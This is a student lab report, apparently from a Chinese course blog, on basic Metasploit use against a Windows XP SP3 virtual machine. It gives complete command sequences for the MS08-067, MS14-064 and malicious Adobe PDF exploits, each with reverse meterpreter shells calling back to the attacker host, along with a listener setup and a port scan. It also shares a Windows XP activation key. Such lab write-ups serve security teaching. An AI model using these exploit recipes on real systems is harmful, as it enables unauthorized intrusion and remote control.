目录
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
漏洞名称:MS08_067
攻击机:Kali
靶机:windows XP SP3(Chinese)未安装漏洞补丁
这里提供系统镜像:https://pan.baidu.com/s/1Gwjwu-SJtHc7OoALaNNdKA
提取码:b3uj
XP系统激活码QC986-27D34-6M3TY-JJXP9-TBGMD
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.111
msf exploit(ms08_067_netapi) > set LPORT 5101
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.150
msf exploit(ms08_067_netapi) > set target 34//Windows XP SP3 Chinese
msf exploit(ms08_067_netapi) > exploit
攻击成功

漏洞名称:MS14-064
攻击机:Kali
靶机:windows XP SP3(Chinese)
输入use exploit/windows/browser/ms14_064_ole_code_execution使用漏洞利用模块
输入set payload windows/meterpreter/reverse_tcp设置反弹连接
输入set SRVHOST 192.168.1.111设置攻击机IP
输入set LHOST 192.168.1.111
输入set AllowPowerShellPrompt true需要用到windows中的powershell
输入set LPORT 5101 设置攻击机监听端口
输入set URIPATH 20165101设置网页地址
输入exploit开始攻击

靶机在浏览器输入http://192.168.1.111:8080/20165101

攻击成功,输入sessions 2,打开会话。

使用adobe_toolbutton模块(唯一)
攻击机:Kali
靶机:windows XP SP3(Chinese)
msf5 > use exploit/windows/fileformat/adobe_toolbutton
msf5 exploit(windows/fileformat/adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_toolbutton) > set LHOST 192.168.1.111
msf5 exploit(windows/fileformat/adobe_toolbutton) > set LPORT 5101
msf5 exploit(windows/fileformat/adobe_toolbutton) > set FILENAME 20165101.pdf
msf5 exploit(windows/fileformat/adobe_toolbutton) > exploit

注意:文件默认放到/root/.msf4/local/目录中,使用mv /root/.msf4/local/20165101.pdf /root/命令复制到主目录下。

在kali上输入back退出当前模块
进入监听模块
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.111
msf5 exploit(multi/handler) > set LPORT 5101
msf5 exploit(multi/handler) > exploit

在XP靶机下打开20165101.pdf文件

攻击成功

msf5 > use auxiliary/scanner/portscan/syn 使用扫描模块
msf5 auxiliary(scanner/portscan/syn) > set RHOST 192.168.1.210 设置目标主机IP
msf5 auxiliary(scanner/portscan/syn) > set THREADS 50 设置线程数
msf5 auxiliary(scanner/portscan/syn) > exploit

利用发现的安全漏洞对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。
针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
本次漏洞攻击实验非常耗时间,虚拟机里Windows系统的自动更新可能把漏洞已经补好了,所以在漏洞的选择方面不是很顺利。
我认为距离实战还缺乏外网穿透到内网的技术,因为我们目前所掌握的技术都仅仅局限于局域网下的攻击,如何绕过复杂的防火墙是我们下一步要学习的重点。
20165101刘天野 2018-2019-2《网络对抗技术》Exp5 MSF基础应用
原文:https://www.cnblogs.com/lty12345678911/p/10746650.html